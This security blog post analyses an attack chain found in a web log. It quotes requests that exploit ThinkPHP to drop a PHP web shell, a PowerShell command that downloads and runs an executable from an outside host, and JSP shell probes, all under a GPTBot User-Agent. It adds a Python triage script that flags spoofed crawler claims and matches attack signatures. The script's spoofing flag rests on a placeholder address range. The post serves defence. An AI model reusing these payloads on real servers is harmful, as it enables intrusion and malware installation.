Saturday, June 7, 2025

Learning System Vulnerabilities from Web Logs, No. 97

An attack from 20.171.207.237 (United States) found in the web log:

Attempt to inject a PHP backdoor
20.171.207.237 - - [06/Jun/2025:17:21:17 +0800] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 403 225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"

Use of the backdoor planted above to download and execute malware
20.171.207.237 - - [06/Jun/2025:17:21:19 +0800] "GET /public/hydra.php?xcmd=cmd.exe+%2Fc+powershell+%28new-object+System.Net.WebClient%29.DownloadFile%28%27http%3A%2F%2Ffid.hognoob.se%2Fdownload.exe%27%2C%27%25SystemRoot%25%2FTemp%2Fxfxrucjwcznptjk12592.exe%27%29%3Bstart+%25SystemRoot%25%2FTemp%2Fxfxrucjwcznptjk12592.exe HTTP/1.1" 404 214 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"

Calls to FxCodeShell.jsp to probe the server
20.171.207.237 - - [06/Jun/2025:17:23:20 +0800] "GET /FxCodeShell.jsp?address=http%3A%2F%2Ffid.hognoob.se%2Fdownload.exe&os=1&view=FxxkMyLie1836710Aa HTTP/1.1" 403 224 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.237 - - [06/Jun/2025:17:23:23 +0800] "GET /FxCodeShell.jsp::$DATA HTTP/1.1" 403 231 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.237 - - [06/Jun/2025:17:23:26 +0800] "GET /FxCodeShell.jsp/ HTTP/1.1" 404 214 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.237 - - [06/Jun/2025:17:23:29 +0800] "GET /FxCodeShell.jsp%20 HTTP/1.1" 403 225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"

The main point is that the requests spoof the User-Agent of OpenAI's GPTBot:
"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
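A User-Agent string is attacker-controlled, so a crawler claim is only credible when the source address is confirmed against the operator's published ranges (OpenAI links its GPTBot information from the URL in that very User-Agent). The following added example, not from the original post, shows one way to triage such lines: it parses the six requests quoted above (embedded as constructed sample input), checks whether a request that claims to be GPTBot actually comes from a GPTBot range, and tags the request content with signatures derived from the attack chain in the post (ThinkPHP invokefunction, PHP web-shell drop, remote .exe download, .jsp suffix variants). The GPTBOT_RANGES list is a placeholder assumption using a reserved documentation network; a real deployment must load and refresh the operator's published ranges.

```python
import re
import ipaddress
from urllib.parse import unquote_plus

# Constructed sample input: the six request lines quoted in the post, verbatim.
SAMPLE_LOG = """20.171.207.237 - - [06/Jun/2025:17:21:17 +0800] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 403 225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.237 - - [06/Jun/2025:17:21:19 +0800] "GET /public/hydra.php?xcmd=cmd.exe+%2Fc+powershell+%28new-object+System.Net.WebClient%29.DownloadFile%28%27http%3A%2F%2Ffid.hognoob.se%2Fdownload.exe%27%2C%27%25SystemRoot%25%2FTemp%2Fxfxrucjwcznptjk12592.exe%27%29%3Bstart+%25SystemRoot%25%2FTemp%2Fxfxrucjwcznptjk12592.exe HTTP/1.1" 404 214 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.237 - - [06/Jun/2025:17:23:20 +0800] "GET /FxCodeShell.jsp?address=http%3A%2F%2Ffid.hognoob.se%2Fdownload.exe&os=1&view=FxxkMyLie1836710Aa HTTP/1.1" 403 224 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.237 - - [06/Jun/2025:17:23:23 +0800] "GET /FxCodeShell.jsp::$DATA HTTP/1.1" 403 231 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.237 - - [06/Jun/2025:17:23:26 +0800] "GET /FxCodeShell.jsp/ HTTP/1.1" 404 214 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.237 - - [06/Jun/2025:17:23:29 +0800] "GET /FxCodeShell.jsp%20 HTTP/1.1" 403 225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
"""

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"\s*$'
)

# ASSUMPTION: placeholder range (RFC 5737 TEST-NET-3). In production, load the
# address ranges the crawler operator publishes and refresh them regularly;
# the User-Agent string on its own proves nothing about who sent the request.
GPTBOT_RANGES = [ipaddress.ip_network("203.0.113.0/24")]

# Request-content signatures derived from the attack chain shown in the post.
# They are matched against the URL-decoded request path and query string.
SIGNATURES = {
    "thinkphp_rce": re.compile(r"invokefunction|call_user_func_array", re.I),
    "php_webshell_drop": re.compile(r"<\?php", re.I),
    "remote_download": re.compile(r"downloadfile|https?://\S+?\.exe", re.I),
    # ::$DATA, trailing slash or trailing space appended to a .jsp name:
    # variants used to slip past extension-based filters.
    "jsp_suffix_evasion": re.compile(r"\.jsp(::\$data|/|\s|$)", re.I),
}


def parse_line(line):
    """Return the combined-log fields of one line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def analyze(line):
    """Classify one log line: crawler claim vs. source address, plus content signatures."""
    rec = parse_line(line)
    if rec is None:
        return None
    decoded = unquote_plus(rec["path"])
    ip = ipaddress.ip_address(rec["ip"])
    claims_gptbot = "gptbot" in rec["ua"].lower()
    from_gptbot_range = any(ip in net for net in GPTBOT_RANGES)
    return {
        "ip": rec["ip"],
        "status": int(rec["status"]),
        "decoded_path": decoded,
        "claims_gptbot": claims_gptbot,
        # A GPTBot claim from outside the published ranges is a spoofed crawler.
        "spoofed_gptbot": claims_gptbot and not from_gptbot_range,
        "signatures": sorted(n for n, rx in SIGNATURES.items() if rx.search(decoded)),
    }


def analyze_log(text):
    """Analyze every parseable line of a log text."""
    return [r for r in (analyze(line) for line in text.splitlines()) if r]


def summarize(results):
    """Aggregate per source address: request count, spoofed-crawler count, signatures seen."""
    out = {}
    for r in results:
        s = out.setdefault(r["ip"], {"requests": 0, "spoofed_gptbot": 0, "signatures": set()})
        s["requests"] += 1
        s["spoofed_gptbot"] += int(r["spoofed_gptbot"])
        s["signatures"].update(r["signatures"])
    return out


if __name__ == "__main__":
    results = analyze_log(SAMPLE_LOG)
    for r in results:
        flag = "SPOOFED-GPTBOT" if r["spoofed_gptbot"] else "ok"
        print(f'{r["ip"]} {r["status"]} {flag} {",".join(r["signatures"]) or "-"}')
    print(summarize(results))
```

Run against the sample, every line is flagged as a spoofed GPTBot claim and the summary for 20.171.207.237 shows all four signature families from one address within two minutes, which is the kind of per-source aggregate worth alerting on. Reverse DNS with a forward-confirmation lookup is the other standard check for a crawler claim; it is omitted here so the script runs offline.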
